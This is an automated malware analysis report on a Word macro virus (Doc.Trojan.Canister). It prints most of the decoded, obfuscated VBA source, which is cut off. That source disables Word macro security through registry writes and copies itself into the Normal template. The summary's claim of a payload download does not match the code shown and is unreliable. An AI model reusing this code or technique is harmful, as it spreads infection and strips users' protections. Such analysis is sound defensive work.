Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d63851cd1e4e8d1d…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 30.5 KB
Created: 2005-06-28 11:38:00
Authoring application: Microsoft Word 9.0
First seen: 2012-10-03
MD5: 045f8c20f9f0d6c6c1c9a26072680c64
SHA-1: f57d67e881e118fcb09d2d954d6a7aef0f357821
SHA-256: d63851cd1e4e8d1d524f6ea8da148ba2ff92b46d51d7fdfd02d95839d828adf0
Risk score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the presence of the extracted macros.bas script. The script uses `CallByName` extensively and constructs registry paths and strings dynamically, suggesting it is designed to download and execute a secondary payload. Strings are obfuscated with `StrReverse` and resolved only at run time; in the extracted code, the Word object-model member names and the registry path under the Word Security key (including the "Level" and "AccessVBOM" value names) are all built this way. The ClamAV detection of 'Doc.Trojan.Canister-1' and the embedded string 'canister.doc' further support malicious intent, likely delivered via spearphishing.

Heuristics (3)

  • ClamAV: Doc.Trojan.Canister-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Canister-1
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • CallByName call (severity: high; rule: OLE_VBA_CALLBYNAME)
    CallByName call

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename:  macros.bas
Kind:      vba-macro
Source:    oletools.olevba.extract_macros (decoded VBA source)
Size:      4506 bytes
SHA-256:   cdfedb9b0cd495570901b83546c0dd6cd598078fddab9e9523b79de7fd149f2c

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close() 'WMXP.CaniSter by Kernel32
FQPOTCYBCLM01: Randomize Timer: Dim KBPOIAJSIJCW(20) As String: Dim MLGBQPWVWVX(10) As String: GoSub FQPOTCYBCLM25: GoTo FQPOTCYBCLM20
FQPOTCYBCLM09: VBA.CallByName CLAUYYGHVGDU, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM10
FQPOTCYBCLM06: VBA.CallByName Options.Application, MLGBQPWVWVX(3), VbLet, XJKMRRVTYRGUW: VBA.CallByName Options, MLGBQPWVWVX(6), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM07:
FQPOTCYBCLM13: KBPOIAJSIJCW(LDYPAMMQBIQB) = "VQWNCIKMOVNKI": KBPOIAJSIJCW(2) = "XJKMRRVTYRGUW": KBPOIAJSIJCW(3) = "LDYPAMMQBIQB": KBPOIAJSIJCW(13) = "MLGBQPWVWVX": GoTo FQPOTCYBCLM14
FQPOTCYBCLM20: MLGBQPWVWVX(1) = StrReverse("senilfotnuoC"): MLGBQPWVWVX(2) = StrReverse("seniL"): GoTo FQPOTCYBCLM21
FQPOTCYBCLM21: MLGBQPWVWVX(3) = StrReverse("gnitadpUneercS"): MLGBQPWVWVX(4) = StrReverse("senileteleD"): GoTo FQPOTCYBCLM22
FQPOTCYBCLM22: MLGBQPWVWVX(5) = StrReverse("gnirtsmorfddA"): MLGBQPWVWVX(6) = StrReverse("tpmorPlamroNevaS"): GoTo FQPOTCYBCLM23
FQPOTCYBCLM07: Set CLAUYYGHVGDU = NormalTemplate.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM08
FQPOTCYBCLM10: Set BUPFMXCXSNUGW = ActiveDocument.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM11
FQPOTCYBCLM25: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), "Level", 1&: GoTo FQPOTCYBCLM26
FQPOTCYBCLM24: MLGBQPWVWVX(9) = StrReverse("strelAyalpsiD"): MLGBQPWVWVX(10) = StrReverse("enilecalpeR"): GoTo FQPOTCYBCLM02
FQPOTCYBCLM16: KBPOIAJSIJCW(10) = "HGSEMIQXFLIQDY": KBPOIAJSIJCW(11) = "UIVFVFDGUKHE": KBPOIAJSIJCW(12) = "KQSSFKXVVMCD": GoTo FQPOTCYBCLM17
FQPOTCYBCLM04: VBA.CallByName Application, MLGBQPWVWVX(7), VbLet, XJKMRRVTYRGUW: VBA.CallByName Application, MLGBQPWVWVX(9), VbLet, wdAlertsNone: GoTo FQPOTCYBCLM05
FQPOTCYBCLM19: For HGSEMIQXFLIQDY = 2 To 25 Step VBA.Int(Rnd * 3) + LDYPAMMQBIQB: UIVFVFDGUKHE = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB + HGSEMIQXFLIQDY, LDYPAMMQBIQB): KQSSFKXVVMCD = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, 2 + HGSEMIQXFLIQDY, LDYPAMMQBIQB): VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + LDYPAMMQBIQB, KQSSFKXVVMCD: VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + 2, UIVFVFDGUKHE: Next: End
FQPOTCYBCLM11: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(4), VbMethod, LDYPAMMQBIQB, VBA.CallByName(BUPFMXCXSNUGW, MLGBQPWVWVX(1), VbGet): GoTo FQPOTCYBCLM12
FQPOTCYBCLM15: KBPOIAJSIJCW(7) = "KBPOIAJSIJCW": KBPOIAJSIJCW(8) = "FQPOTCYBCLM": KBPOIAJSIJCW(9) = "BRYTJTKYYSHVMU": GoTo FQPOTCYBCLM16
FQPOTCYBCLM26: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), StrReverse("MOBVsseccA"), 1&: Return
FQPOTCYBCLM12: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM19
FQPOTCYBCLM05: VBA.CallByName Application.Options, MLGBQPWVWVX(8), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM06
FQPOTCYBCLM18: QCAJUDMVDGGJEV = Replace(QCAJUDMVDGGJEV, KBPOIAJSIJCW(Int(Rnd * 13) + LDYPAMMQBIQB), BRYTJTKYYSHVMU): Return
FQPOTCYBCLM02: XJKMRRVTYRGUW = (False * False): LDYPAMMQBIQB = (True / True): Set VQWNCIKMOVNKI = VBE.ActiveVBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM03
FQPOTCYBCLM23: MLGBQPWVWVX(7) = StrReverse("raBsutatsyalpsiD"): MLGBQPWVWVX(8) = StrReverse("snoisrevnoCmrifnoC"): GoTo FQPOTCYBCLM24
FQPOTCYBCLM14: KBPOIAJSIJCW(4) = "QCAJUDMVDGGJEV": KBPOIAJSIJCW(5) = "CLAUYYGHVGDU": KBPOIAJSIJCW(6) = "BUPFMXCXSNUGW": GoTo FQPOTCYBCLM15
FQPOTCYBCLM03: QCAJUDMVDGGJEV = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB, VBA.CallByName(VQWNCIKMOVNKI
... (truncated)